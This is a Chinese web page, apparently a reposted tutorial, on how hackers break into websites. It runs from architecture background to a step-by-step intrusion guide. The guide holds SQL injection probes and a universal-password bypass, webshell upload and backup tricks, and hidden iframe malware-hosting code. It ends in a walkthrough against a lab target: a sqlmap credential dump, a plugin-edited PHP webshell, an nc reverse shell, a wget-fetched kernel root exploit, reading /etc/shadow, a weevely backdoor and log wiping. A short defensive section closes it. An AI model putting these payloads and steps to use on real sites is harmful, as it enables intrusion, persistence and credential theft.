整合營銷服務(wù)商

          電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理

          免費(fèi)咨詢熱線:

          黑客是如何入侵一個網(wǎng)站的? 黑客入侵網(wǎng)站的步驟詳解

          客是如何入侵一個網(wǎng)站的?

          黑客入侵網(wǎng)站的步驟詳解:他們的行動藍(lán)圖

          在理論上,黑客對網(wǎng)站的入侵過程可概括為以下幾步:

          信息搜集:深入研究目標(biāo)網(wǎng)站,盡可能搜集詳盡的信息。

          掃描與枚舉:確認(rèn)開放的端口,運(yùn)行的服務(wù)以及可能存在的安全漏洞。

          提權(quán)與攻擊:嘗試?yán)谜业降穆┒催M(jìn)入網(wǎng)站后臺或數(shù)據(jù)庫。

          維持訪問權(quán)限:一旦成功入侵,黑客可能會尋求保持其訪問權(quán)限,以備后用。

          清除痕跡:刪除日志文件和其他痕跡,避免被發(fā)現(xiàn)。

          強(qiáng)調(diào)一點(diǎn),上述所有行為,若未經(jīng)網(wǎng)站所有者或管理員的明確許可,均屬非法。對于有志于網(wǎng)絡(luò)安全事業(yè)、希望提升技能并進(jìn)行職業(yè)發(fā)展的人來說,合法的途徑包括成為網(wǎng)絡(luò)安全分析師、滲透測試員或道德黑客。正當(dāng)?shù)木W(wǎng)絡(luò)安全實(shí)踐包括在合同范圍內(nèi)執(zhí)行滲透測試、網(wǎng)絡(luò)防御和安全漏洞評估,以幫助組織加強(qiáng)其網(wǎng)站和網(wǎng)絡(luò)的安全性。

          所需工具:黑客的得力助手

          黑客常使用各種工具來發(fā)現(xiàn)并利用網(wǎng)站的弱點(diǎn),這些工具包括:

          掃描器:此類工具可掃描網(wǎng)站的端口,尋找開放的服務(wù)和潛在的安全漏洞。

          漏洞掃描工具:用于分析網(wǎng)站的安全漏洞,查找已知的安全弱點(diǎn)。

          Web代理工具:允許攔截和修改從瀏覽器發(fā)出的網(wǎng)絡(luò)請求。

          密碼破解工具:用于分析和破解網(wǎng)站登錄憑據(jù)的工具。

          自動化攻擊框架:如Metasploit等高級工具,提供一個平臺來管理和激活多種攻擊。

          必備語言:黑客的通行密鑰

          盡管黑客可能需要掌握多種編程語言,但以下幾種語言尤為關(guān)鍵:

          HTML/JavaScript:了解網(wǎng)站的構(gòu)建基礎(chǔ),能夠識別和利用客戶端的漏洞。

          SQL:用于與數(shù)據(jù)庫通信,黑客利用SQL注入攻擊直接操控網(wǎng)站的數(shù)據(jù)庫。

          Python/Perl/Ruby:這些腳本語言適用于快速開發(fā)攻擊工具或腳本。

          PHP/Java:熟悉這些服務(wù)器端語言有助于理解后臺處理和潛在的安全漏洞。

          還需掌握的能力:

          黑客不僅需要理論知識,還需具備以下能力:

          逆向工程和代碼審計:分析和理解不提供源代碼的應(yīng)用程序。

          網(wǎng)絡(luò)分析:監(jiān)控和解讀網(wǎng)絡(luò)流量,發(fā)現(xiàn)潛在的數(shù)據(jù)傳輸弱點(diǎn)。

          加密與解密:理解加密技術(shù),有時還需能夠解密加密信息。

          社會工程學(xué):利用人類心理,誘導(dǎo)他們泄露敏感信息或執(zhí)行某些操作。

          此外,不斷提升自己的知識和技巧,遵循職業(yè)道德和法律規(guī)定,投身于防御工作,這些都是網(wǎng)絡(luò)安全專家成長之路的關(guān)鍵。通過增強(qiáng)對網(wǎng)絡(luò)安全挑戰(zhàn)的意識,我們可以共同構(gòu)建一個更安全、更能抵御惡意攻擊者的數(shù)字環(huán)境。

          #數(shù)據(jù)庫誤操作# #黑客行為爭議# #分享編程心得# #相對url# #加密技術(shù)應(yīng)用#

          #春日生活打卡季#

          “黑客”實(shí)戰(zhàn)篇之“網(wǎng)站入侵的攻與防詳解”

          之前在黑客技術(shù)文章中講了很多黑客技術(shù)原理,近期我將通過文章講述一些黑客實(shí)戰(zhàn)內(nèi)容,想了解黑客實(shí)戰(zhàn)技術(shù)的朋友可以多關(guān)注我的文章。

          今天就以本篇文章內(nèi)容給大家講述一下黑客"入侵網(wǎng)站的"基本流程以及技術(shù)實(shí)現(xiàn)過程!

          一、 先摸清網(wǎng)站的基本架構(gòu)(知己知彼學(xué)習(xí))

          常見的幾種基本架構(gòu)如下:

          1、單機(jī)模式

          應(yīng)用程序、數(shù)據(jù)庫、文件等所有資源都集中在一臺 Server上,典型案例:基于 LAMP 架構(gòu)的 PHP 網(wǎng)站;

          單機(jī)時代(純依賴RDBMS)

          優(yōu)點(diǎn):簡單、快速迭代達(dá)成業(yè)務(wù)目標(biāo);缺點(diǎn):存在單點(diǎn)、談不上高可用;技術(shù)點(diǎn):應(yīng)用設(shè)計要保證可擴(kuò)展;

          2、單機(jī)+緩存模式

          有一定的業(yè)務(wù)量和用戶規(guī)模了,想提升網(wǎng)站速度,于是,緩存出場了

          單機(jī)時代+緩存出場

          優(yōu)點(diǎn):簡單有效、方便維護(hù);缺點(diǎn):存在單點(diǎn)、談不上高可用;技術(shù)點(diǎn):客戶端(瀏覽器)緩存、前端頁面緩存、頁面片段緩存、本地數(shù)據(jù)緩存/數(shù)據(jù)庫緩存、遠(yuǎn)程緩存;

          3、數(shù)據(jù)服務(wù)與應(yīng)用分離模式

          用戶量每天在增長,數(shù)據(jù)庫瘋狂讀寫,逐漸發(fā)現(xiàn)一臺服務(wù)器快撐不住了。于是,決定把數(shù)據(jù)服務(wù)和APP做分離

          數(shù)據(jù)服務(wù)與應(yīng)用分離

          優(yōu)點(diǎn):簡單有效、方便維護(hù)、提高不同Server對硬件資源的利用率;缺點(diǎn):存在單點(diǎn)、談不上高可用;技術(shù)點(diǎn):文件服務(wù)器部署、數(shù)據(jù)庫服務(wù)器,擴(kuò)展數(shù)據(jù)訪問模塊;

          分離后三臺 Server 對硬件資源的需求各不相同:

          4、數(shù)據(jù)庫讀寫分離模式

          單臺數(shù)據(jù)庫也感覺快撐不住了,一般都會嘗試做"讀寫分離"。由于大部分互聯(lián)網(wǎng)"讀多寫少"的特性所決定的。Salve的臺數(shù),取決于按業(yè)務(wù)評估的讀寫比例。

          數(shù)據(jù)庫讀寫分離

          優(yōu)點(diǎn):簡單有效、降低數(shù)據(jù)庫單臺壓力;缺點(diǎn):讀寫分離,增加程序難度,架構(gòu)變復(fù)雜,維護(hù)難度增加;技術(shù)點(diǎn):數(shù)據(jù)庫主從同步部署,擴(kuò)展數(shù)據(jù)訪問模塊,實(shí)現(xiàn)讀寫分離;

          5、應(yīng)用服務(wù)集群模式

          數(shù)據(jù)庫層面是緩解了,但是應(yīng)用程序?qū)用嬉渤霈F(xiàn)了瓶頸,由于訪問量增大,加上早期程序員水平有限寫的代碼也很爛,人員流動性也大,很難去維護(hù)和優(yōu)化。所以,很常用的辦法還是"堆機(jī)器"。

          應(yīng)用出現(xiàn)瓶頸 負(fù)載均衡集群

          優(yōu)點(diǎn):增加服務(wù)器和HA機(jī)制,系統(tǒng)性能及可用性得到保證;缺點(diǎn):應(yīng)用之間緩存、Session一致性問題;技術(shù)點(diǎn):負(fù)載均衡;

          通過集群解決高并發(fā)、海量數(shù)據(jù)問題的常用手段,實(shí)現(xiàn)系統(tǒng)的可伸縮性。通過負(fù)載均衡調(diào)度器,可將用戶訪問分發(fā)到集群中的某臺 Server 上,應(yīng)用服務(wù)器的負(fù)載壓力不再成為整個網(wǎng)站的瓶頸。

          6、集中式緩存、Session集中存儲

          加機(jī)器誰都會加,關(guān)鍵是加完之后得有效果,加完之后可能會引發(fā)一些問題。例如非常常見的:集群應(yīng)用之間頁面輸出緩存和本地緩存一致性的問題,Session保存的問題......

          集中式緩存 Session集中存儲

          優(yōu)點(diǎn):應(yīng)用之間緩存、Session一致,存儲無限制,可以擴(kuò)展;缺點(diǎn):不如本地緩存訪問快,緩存服務(wù)器、Session服務(wù)器等仍存在單點(diǎn)問題;技術(shù)點(diǎn):緩存服務(wù)器部署、Session集中存儲方案;

          7、動靜分離

          動靜分離也是提高網(wǎng)站響應(yīng)速度的一種常用方式。將動態(tài)請求與靜態(tài)請求分離開,盡量減少對應(yīng)用服務(wù)器的壓力。同時,可以再進(jìn)一步對靜態(tài)請求,進(jìn)行緩存,以加快響應(yīng)速度。可以需要開發(fā)人員配合(把靜態(tài)資源放獨(dú)立站點(diǎn)下),也可以不需要開發(fā)人員配合(利用7層反向代理來處理,根據(jù)后綴名等信息來判斷資源類型)。

          使用動靜分離

          優(yōu)點(diǎn):減輕應(yīng)用負(fù)載壓力,針對靜態(tài)文件緩存;缺點(diǎn):靜態(tài)文件緩存更新失效問題;技術(shù)點(diǎn):動靜分離、靜態(tài)文件緩存方案;

          8、反向代理和CDN加速網(wǎng)站響應(yīng)

          使用反向代理和CDN加速網(wǎng)站響應(yīng):CDN 和反向代理的基本原理都是緩存,區(qū)別在于:

          1. CDN部署在網(wǎng)絡(luò)提供商的機(jī)房;

          2. 反向代理則部署在網(wǎng)站的中心機(jī)房;

          使用 CDN 和反向代理的目的都是盡早返回數(shù)據(jù)給用戶,一方面加快用戶訪問速度,另一方面也減輕后端服務(wù)器的負(fù)載壓力。

          使用反向代理和 CDN 加速網(wǎng)站響應(yīng)

          優(yōu)點(diǎn):減輕應(yīng)用負(fù)載壓力,異地緩存有效解決不同地方用戶訪問過慢的問題;缺點(diǎn):成本大幅增加,架構(gòu)進(jìn)一步復(fù)雜化,也維護(hù)難度進(jìn)一步增大,靜態(tài)文件緩存更新失效問題;技術(shù)點(diǎn):CDN、反向代理方案;

          9、使用NoSQL和搜索引擎

          到這里,已經(jīng)基本做到了DB層面和應(yīng)用層面的橫向擴(kuò)展了,可以開始關(guān)注一些其它方面,例如:站內(nèi)搜索的精準(zhǔn)度,對DB的依賴,開始引入全文索引、NoSQL

          NoSQL和搜索引擎都是源自互聯(lián)網(wǎng)的技術(shù)手段,對可伸縮的分布式特性具有更好的支持。應(yīng)用服務(wù)器則通過一個統(tǒng)一數(shù)據(jù)訪問模塊訪問各種數(shù)據(jù),減輕應(yīng)用程序管理諸多數(shù)據(jù)源的麻煩。

          使用NoSQL和搜索引擎

          優(yōu)點(diǎn):降低DB依賴;缺點(diǎn):單點(diǎn)問題,談不上高可用;技術(shù)點(diǎn):NoSQL、搜索引擎、分布式;

          網(wǎng)站的入侵基本流程

          1、信息收集

          1) Whois信息--注冊人、電話、郵箱、DNS、地址

          2) Googlehack--敏感目錄、敏感文件、后臺地址

          3) 服務(wù)器IP--Nmap掃描、端口對應(yīng)的服務(wù)、C段

          4) 旁注--Bing查詢、腳本工具

          5) 如果遇到CDN--Cloudflare(繞過)、從子域入手(mail,postfix)、DNS傳送域漏洞

          6) 服務(wù)器、組件(指紋)--操作系統(tǒng)、web server(apache,nginx,iis)、腳本語言,數(shù)據(jù)庫類型

          2、漏洞挖掘

          1) 探測Web應(yīng)用指紋--如博客類:Wordpress、Emlog、Typecho、Z-blog,社區(qū)類:Discuz、PHPwind、Dedecms,StartBBS、Mybb等等,PHP腳本類型:Dedecms、Discuz!、PHPCMS、PHPwind

          2) XSS、CSRF、SQLinjection、權(quán)限繞過、任意文件讀取、文件包含...

          3) 上傳漏洞--截斷、修改、解析漏洞

          4) 有無驗(yàn)證碼--進(jìn)行暴力破解

          3、漏洞利用

          1) 思考目的性--達(dá)到什么樣的效果

          2) 隱藏,破壞性--根據(jù)探測到的應(yīng)用指紋尋找對應(yīng)的exp攻擊載荷或者自己編寫

          3) 開始漏洞攻擊,獲取相應(yīng)權(quán)限,根據(jù)場景不同變化思路拿到webshell

          4、權(quán)限提升

          1) 根據(jù)服務(wù)器類型選擇不同的攻擊載荷進(jìn)行權(quán)限提升

          2) 無法進(jìn)行權(quán)限提升,結(jié)合獲取的資料開始密碼猜解,回溯信息收集

          5、植入后門

          1) 隱蔽性

          2) 定期查看并更新,保持周期性

          6、日志清理

          1) 偽裝,隱蔽,避免激警他們通常選擇刪除指定日志

          2) 根據(jù)時間段,find相應(yīng)日志文件 太多太多。

          三、 黑客入侵網(wǎng)站的常規(guī)思路方法

          1、經(jīng)典注入

          通常,判斷一個網(wǎng)站是否存在注入點(diǎn),可以用',and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,來判斷,如果and 1=1正常返回頁面,1=2錯誤,或者找不到,那么就存在注入點(diǎn)

          2、萬能密碼OR漏洞

          萬能密碼'or'='or',可以用在后臺管理輸入,有的網(wǎng)站由于沒有過濾OR漏洞,輸入OR直接就可以突破,一般漏洞存在于ASP類型的網(wǎng)站

          3、爆庫

          爆庫,可以理解為爆出數(shù)據(jù)庫下載,用爆庫之類的工具可以直接就獲得管理員用戶和密碼,%5C為十六進(jìn)制的\符號,而數(shù)據(jù)庫大于5.0就可以進(jìn)行爆庫,如在PHP手工高級注入時,用VERSION()這個變量猜出網(wǎng)站數(shù)據(jù)庫版本,如果一個網(wǎng)站數(shù)據(jù)庫大于5.0,且是ACESS數(shù)據(jù)庫,那么提交地址是:http://www.xxx.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC后面,因?yàn)?5C是爆二級目錄,所以應(yīng)該是這樣,http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理員為了防止他人非法下載數(shù)據(jù)庫,而把數(shù)據(jù)庫改成#database.mdb,這樣防止了,如果頁面地址為http://www.xx.com/rpd/#database.mdb,是這樣的,那么我們把%23加到替換#,http://www.xx.com/rpd/%23database.mdb

          4、COOKIE中轉(zhuǎn),SQL防注入程序,提醒你IP已被記錄

          COOKIE中轉(zhuǎn),SQL防注入,如果檢測一個網(wǎng)站時,彈出這樣一個對話框,上面出現(xiàn)SQL防注入程序提醒的字語,那么我們可以利用COOKIE中轉(zhuǎn),注入中轉(zhuǎn)來突破,方法是先搭建一個ASP環(huán)境(且網(wǎng)站為ASP網(wǎng)站),然后打開中轉(zhuǎn)工具,記住一個網(wǎng)站的頁面地址粘貼進(jìn)工具里,值是多少就寫多少,生成,把生成的文件放到目錄里,接下來,打開網(wǎng)頁,輸入http://127.0.0.1:(端口)/目錄里文件,如果正常,那么輸入http://127.0.0.1:端口/值(目錄文件)?提交值,那么拿到工具里猜表名,列名了

          5、手工

          ASP手工語句表名 and exists (select * from 表名)

          列名 and (select count(列名) from 表名)>0

          長度 and (select top 1 len(username) from admin)>0

          內(nèi)容 and (select top 1 asc(mid(username,1,1)) from admin)>100

          PHP手工語句:order by(猜字段),and 1=2 union select (字段數(shù))and 1=2 union selsect from(位置)

          幾個常用變量 ,USER(),VERSION()<數(shù)據(jù)庫版本),database()<數(shù)據(jù)庫名稱>

          6、抓包拿WEBSHELL

          如果進(jìn)入后臺發(fā)現(xiàn),點(diǎn)數(shù)據(jù)庫備份的時候發(fā)現(xiàn)找不到,可以通過抓包來獲得上傳,拿到WEBSHELL,工具WOSCK抓包,一張圖片,一個ASP馬,自行搭建一個上傳地址,UPLOAD加載,UPFILE上傳,COOKIS=( )

          7、數(shù)據(jù)庫備份拿WEBSHELL和一句話木馬入侵

          通常進(jìn)入后臺了,發(fā)現(xiàn)有數(shù)據(jù)庫備份,拿WEBSHELL吧,找一個添加產(chǎn)品的地方,傳一個大馬,格式為JPG圖片,然后把圖片地址粘貼到數(shù)據(jù)庫備份那里,給起個名字,如SHELL.ASP,然后合地址訪問的時候就進(jìn)入webshell了,一句話木馬入侵,先編輯記事本,加入一句話,改為2.jpg,然后備份,訪問,發(fā)現(xiàn)500內(nèi)部服務(wù)器錯誤,證明一句話成功,接下來用一句話木馬客戶端連接,得到路徑頁面,然后改下馬名,輸入大馬內(nèi)容,提交,得到WEBSHELL

          8、DB權(quán)限差異備份拿WEBSHELL

          如果一個網(wǎng)站注入點(diǎn)是MYSQL數(shù)據(jù)庫,且是DB權(quán)限,或者是SA權(quán)限,能夠列目錄,那么就好辦了,找到網(wǎng)站的目錄,目錄通常在D和E盤,備份個小馬,合地址訪問看看成功沒,直接備份大馬貌似不行,成功后,再輸入大馬內(nèi)容,拿到WEBSHELL

          9、找后臺

          找后臺,一般默認(rèn)為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,當(dāng)然,這只是默認(rèn),一些大網(wǎng)站不可能還用admin作為后臺,有的隱藏很深,可以簡單用site:網(wǎng)站 inurl:后臺來猜,或者下載源HTML文件分析找出后臺,或者用各種工具來掃描了,方法很多的

          10、腳本提示

          有的網(wǎng)站要求進(jìn)入后臺會出現(xiàn)一個腳本提示,就像VB編程里INPUTBOX "",一個對話輸入框,我們輸入administrator突破,admin代表以管理員身份來進(jìn)入

          11、php后門和EWEBEDITOR編輯器入侵

          PHP后門,如之前爆出的DISZ漏洞,在一個PHP網(wǎng)站后面加C.PHP,如果出現(xiàn)1,那么傳個PHP馬就拿到WEBSHELL,EWEBEDITOR編輯器入侵,是很快速的方式,設(shè)置好上傳文件類型,傳ASA,或者其他的格式,然后訪問拿到WEBSHELL,如沒有直接加語句拿到WEBSHELL

          12、上傳漏洞

          有的網(wǎng)站雖然沒有注入點(diǎn),但存在一個上傳漏洞,那么我們?nèi)绾蝸砝昧耍紫龋蜷_上傳地址看是否存在,如果有,試想傳一個ASP大馬是不行的,那么傳一句話看看,先看能成功不,用明小子來上傳,動網(wǎng),動力,動感,喬客4種方式,頁面地址格式要對應(yīng),如果一個網(wǎng)站地址彈出對話框,顯示上傳成功,那么證明可以拿到WEBSHELL,傳馬,另外有的沒有任何顯示,直接空的,那么可以構(gòu)建兩個上傳,第一個傳JPG的圖片,第二個傳ASP馬(大馬),記住,大馬后面要有個空格才行,如果一個網(wǎng)站地址出現(xiàn)文件類型不正確,請重新上傳,那么證明%90可以拿到WEBSHELL,只是格式不對,不允許,改后綴,只要是網(wǎng)站沒有過濾的格式,如果一個網(wǎng)站地址顯示請登陸再上傳,那么證明沒有拿到COOKIS,思路是在該網(wǎng)站注冊一個用戶,得到COOKIS,然后上傳就成功了

          13、簡單提權(quán)拿下服務(wù)器和SERV提權(quán)和pcanywhere三方提權(quán)

          簡單拿下服務(wù)器,也就是拿下網(wǎng)站IP主機(jī),首先我們需要一個WEBSHELL,然后看看組件信息,看看路徑可讀可以寫不,如果有一個可以,那么來到CMD命令下,首先輸入可寫的文件內(nèi)容,執(zhí)行命令加一個帳號和最高管理權(quán)限,然后輸入netstat -an,得到主機(jī)連接端口,然后用3389連接進(jìn)入,讓其成為肉雞(最好),這樣比較隱蔽我們操作

          14、反查入侵和旁注和社會工程學(xué)

          反查IP入侵,也就是入侵21,端口,首先我們?nèi)肭志W(wǎng)站先PING WWW.XXX.COM ,出IP,然后到反查IP站點(diǎn)查掛了多少個域名,接下來,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,321,456),然后用流光探測密碼,登陸ftp://ip,輸入用戶和密碼,改掉信息等等,社會工程學(xué)X-WAY,來得到FTP密碼,也需要收集,并不是每個都行,總之是自己的經(jīng)驗(yàn)

          15、跨站腳本攻擊

          跨站(CSS),被動攻擊,現(xiàn)在需要更多的思路和經(jīng)驗(yàn)了

          三段經(jīng)典跨站代碼

          <script>alert("跨站開始")</script>

          <script>alert("document.cookie")</script>

          <script>window.open(http://www.hackgirl.net)</script>

          16、特殊空格

          利用TAB制作的特殊空格,然后注冊時輸入空格,加管理名字,隨便在網(wǎng)站上找個斑竹,或者管理的名字,這樣來注冊,有時自己注冊的這個也會變成管理員

          17、改主頁

          改主頁,拿到WEBSHELL后,先找出首頁文件,一般為index.asp,index.php.index.jsp,index.html,然后來到站點(diǎn)根目錄,編輯index.asp(首頁),清空,最好備份,輸入自己的主頁代碼(黑頁),保存,再訪問時已經(jīng)變成自己想要的結(jié)果了

          18、掛馬

          首先在WEBSHELL里,建立一個文本,改為1.htm,接下來在主頁最下面掛

          兩段經(jīng)典掛馬代碼

          <html>

          <iframe src="http://www.xxxx.com/2.htm" width="0" height="0" frameborder="0"></iframe>

          </html>

          <SCRIPT language=javascript>

          window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");

          </script>

          四、 網(wǎng)站入侵全過程實(shí)例

          假設(shè)入侵的網(wǎng)站域名是hack-test.com

          第一步:用ping命令獲取網(wǎng)站服務(wù)器的IP地址

          現(xiàn)在我們獲取了網(wǎng)站服務(wù)器的IP地址為:173.236.138.113

          第二步:尋找同一服務(wù)器上的其它網(wǎng)站,我們使用sameip.org.

          26 sites hosted on IP Address 173.236.138.113

          173.236.138.113上有26個網(wǎng)站,很多黑客為了攻破你的網(wǎng)站可能會檢查同服務(wù)器上的其它網(wǎng)站,但是本次是以研究為目標(biāo),我們將拋開服務(wù)器上的其它網(wǎng)站,只針對本次測試的網(wǎng)站來進(jìn)行入侵檢測。

          第三步:查詢關(guān)于網(wǎng)站的以下信息:

          1. DNS records (A, NS, TXT, MX and SOA)

          2. Web Server Type (Apache, IIS, Tomcat)

          3. Registrar (the company that owns your domain)

          4. Your name, address, email and phone

          5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)

          6. Your server OS (Unix,Linux,Windows,Solaris)

          7. Your server open ports to internet (80, 443, 21, etc.)

          讓我們開始找網(wǎng)站的DNS記錄,我們用who.is來完成這一目標(biāo).

          發(fā)現(xiàn)DNS記錄如下:

          確定web服務(wù)器的類型:

          發(fā)現(xiàn)Web服務(wù)器是apache,接下來確定它的版本.

          IP: 173.236.138.113

          Website Status: active

          Server Type: Apache

          Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753

          Page Views per Visit: 1 Month: 2.0 3Month: 3.7

          接下來尋找網(wǎng)站域名的注冊信息,你的電話、郵箱、地址等

          現(xiàn)在已經(jīng)獲取了你的網(wǎng)站域名的注冊信息,包括你的重要信息等.

          接下來可以通過backtrack5中的whatweb來獲取網(wǎng)站服務(wù)器操作系統(tǒng)類型和服務(wù)器的版本:

          發(fā)現(xiàn)網(wǎng)站使用了著名的php整站程序wordpress,服務(wù)器的的系統(tǒng)類型為FedoraLinux,Web服務(wù)器版本Apache 2.2.15。

          繼續(xù)查看網(wǎng)站服務(wù)器開放的端口,用滲透測試工具nmap:

          1、Find services that run on server(查看服務(wù)器上運(yùn)行的服務(wù))

          2、Find server OS(查看操作系統(tǒng)版本)

          只有80端口是開放的,操作系統(tǒng)是Linux2.6.22(Fedora Core 6),現(xiàn)在已經(jīng)收集了所有關(guān)于網(wǎng)站的重要信息,接下來開始掃描尋找漏洞,比如:

          Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等

          3、用Nikto來收集漏洞信息:

          root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com

          4、用到Backtrack 5 R1中的W3AF 工具:

          root@bt:/pentest/web/w3af#./w3af_gui

          輸入要檢測的網(wǎng)站地址,選擇完整的安全審計選項(xiàng)

          稍等一會,將會看到掃描結(jié)果

          發(fā)現(xiàn)你的網(wǎng)站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞.

          http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

          第四步:通過工具發(fā)現(xiàn)這個URL存在SQL注入,我們通過Sqlmap來檢測這個url.

          Using sqlmap with –u url

          輸入N按回車鍵繼續(xù)

          發(fā)現(xiàn)你的網(wǎng)站存在mysql顯錯注入,mysql數(shù)據(jù)庫版本是5.0. 我們通過加入?yún)?shù)"-dbs"來嘗試采集數(shù)據(jù)庫名

          發(fā)現(xiàn)三個數(shù)據(jù)庫,接下來通過參數(shù)"-D wordpress -tables"來查看wordpress數(shù)據(jù)庫的所有表名

          通過參數(shù)"-T wp_users –columns "來查看wp_users表中的字段.

          接下來猜解字段user_login和user_pass的值.用參數(shù)"-C user_login,user_pass–dump"

          會發(fā)現(xiàn)用戶名和密碼hashes值

          第五步:通過以下在線破解網(wǎng)站來破解密碼hashes

          http://www.onlinehashcrack.com/free-hash-reverse.php

          第六步:登陸wordpress的后臺wp-admin

          嘗試上傳php webshell到服務(wù)器,以方便運(yùn)行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點(diǎn)擊更新文件,然后訪問我們的phpwebshell.

          Phpwebshell被解析了,我們可以控制網(wǎng)站的文件,但是我們只希望獲得網(wǎng)站服務(wù)器的root權(quán)限,來入侵服務(wù)器上其它的網(wǎng)站。

          第六步:用NC來反彈一個shell

          首先在我們的電腦上監(jiān)聽5555端口。

          然后在Php webshell上反向連接我們的電腦,輸入IP和端口5555.

          點(diǎn)擊連接我們會看到

          接下來我們嘗試執(zhí)行一些命令:

          id

          uid=48(apache) gid=489(apache) groups=489(apache)

          (用來顯示用戶的id和組)

          pwd

          /var/www/html/Hackademic_RTB1/wp-content/plugins

          (顯示服務(wù)器上當(dāng)前的路徑)

          uname -a

          Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

          (顯示內(nèi)核版本信息)

          現(xiàn)在我們知道,服務(wù)器的內(nèi)核版本是2.6.31.5-127.fc12.1686,我們在exploit-db.com中搜索此版本的相關(guān)漏洞.

          第七步:在服務(wù)器上測試了很多exp之后,用以下的exp來提升權(quán)限.

          http://www.exploit-db.com/exploits/15285

          在nc shell上執(zhí)行以下命令:

          wgethttp://www.exploit-db.com/exploits/15285 -o roro.c

          (下載exp到服務(wù)器并重命名為roro.c)

          注:很多l(xiāng)inux內(nèi)核的exp都是C語言開發(fā)的,因此我們保存為.c擴(kuò)展名.

          exp roro.c代碼如下:

          #include

          #define RECVPORT 5555

          #define SENDPORT 6666

          int prep_sock(int port)

          {

          int s, ret;

          struct sockaddr_in addr;

          s = socket(PF_RDS, SOCK_SEQPACKET, 0);

          if(s < 0)

          {

          printf("[*] Could not open socket.");

          exit(-1);

          }

          memset(&addr, 0, sizeof(addr));

          通過以上代碼我們發(fā)現(xiàn)該exp是C語言開發(fā)的,我們需要將他編譯成elf格式的,命令如下:

          gcc roro.c –ororo

          接下來執(zhí)行編譯好的exp

          ./roro

          執(zhí)行完成之后我們輸入id命令

          id

          發(fā)現(xiàn)我們已經(jīng)是root權(quán)限了

          uid=0(root) gid=0(root)

          現(xiàn)在我們可以查看/etc/shadow文件

          cat/etc/shadow

          第八步:用weevely制作一個php小馬上傳到服務(wù)器上,留個后門

          1、weevely使用選項(xiàng)

          root@bt:/pentest/backdoors/web/weevely#./main.py

          2.用weevely創(chuàng)建一個密碼為koko的php后門

          root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

          接下來上傳到服務(wù)器之后來使用它

          root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

          測試我們的hax.php后門

          以上就是入侵網(wǎng)站的全過程實(shí)例描述!

          五、如何判斷網(wǎng)站被黑?如何應(yīng)對網(wǎng)站被黑?如何防止網(wǎng)站被黑?

          1、如何判斷網(wǎng)站被黑?

          如果存在下列問題,則您的網(wǎng)站可能已經(jīng)被黑客攻擊:

          1) 通過site命令查詢站點(diǎn),顯示搜索引擎收錄了大量非本站應(yīng)有的頁面。

          2) 從百度搜索結(jié)果中點(diǎn)擊站點(diǎn)的頁面,跳轉(zhuǎn)到了其他站點(diǎn)。

          3) 站點(diǎn)內(nèi)容在搜索結(jié)果中被提示存在風(fēng)險。

          4) 從搜索引擎帶來的流量短時間內(nèi)異常暴增。

          一旦發(fā)現(xiàn)上述異常,建議您立即對網(wǎng)站進(jìn)行排查。包括:

          1、分析系統(tǒng)和服務(wù)器日志,檢查自己站點(diǎn)的頁面數(shù)量、用戶訪問流量等是否有異常波動,是否存在異常訪問或操作日志;

          2、檢查網(wǎng)站文件是否有不正常的修改,尤其是首頁等重點(diǎn)頁面;

          3、網(wǎng)站頁面是否引用了未知站點(diǎn)的資源(圖片、JS等),是否被放置了異常鏈接;

          4、檢查網(wǎng)站是否有不正常增加的文件或目錄;

          5、檢查網(wǎng)站目錄中是否有非管理員打包的網(wǎng)站源碼、未知txt文件等。

          2、如何應(yīng)對網(wǎng)站被黑?

          如果排查確認(rèn)您的網(wǎng)站存在異常,此時您需要立即做出處理,包括:

          1) 立即停止網(wǎng)站服務(wù),避免用戶繼續(xù)受影響,防止繼續(xù)影響其他站點(diǎn)(建議使用503返回碼)。

          2) 如果同一主機(jī)提供商同期內(nèi)有多個站點(diǎn)被黑,您可以聯(lián)系主機(jī)提供商,敦促對方做出應(yīng)對。

          3) 清理已發(fā)現(xiàn)的異常,排查出可能的被黑時間,和服務(wù)器上的文件修改時間相比對,處理掉黑客上傳、修改過的文件;檢查服務(wù)器中的用戶管理設(shè)置,確認(rèn)是否存在異常的變化;更改服務(wù)器的用戶訪問密碼。

          注:可以從訪問日志中,確定可能的被黑時間。不過黑客可能也修改服務(wù)器的訪問日志。

          4) 做好安全工作,排查網(wǎng)站存在的漏洞,防止再次被黑。

          3、如何防止網(wǎng)站被黑?

          1) 為避免您的網(wǎng)站被黑客攻擊,您需要在平時做大量的工作,例如

          2) 定期檢查服務(wù)器日志,檢查是否有可疑的針對非前臺頁面的訪問。

          3) 經(jīng)常檢查網(wǎng)站文件是否有不正常的修改或者增加。

          4) 關(guān)注操作系統(tǒng),以及所使用程序的官方網(wǎng)站。如果有安全更新補(bǔ)丁出現(xiàn),應(yīng)立即部署,不使用官方已不再積極維護(hù)的版本,如果條件允許,建議直接更新至最新版;關(guān)注建站程序方發(fā)布的的安全設(shè)置準(zhǔn)則。

          5) 系統(tǒng)漏洞可能出自第三方應(yīng)用程序,如果網(wǎng)站使用了這些應(yīng)用程序,建議仔細(xì)評估其安全性。

          6) 修改開源程序關(guān)鍵文件的默認(rèn)文件名,黑客通常通過自動掃描某些特定文件是否存在的方式來判斷是否使用了某套程序。

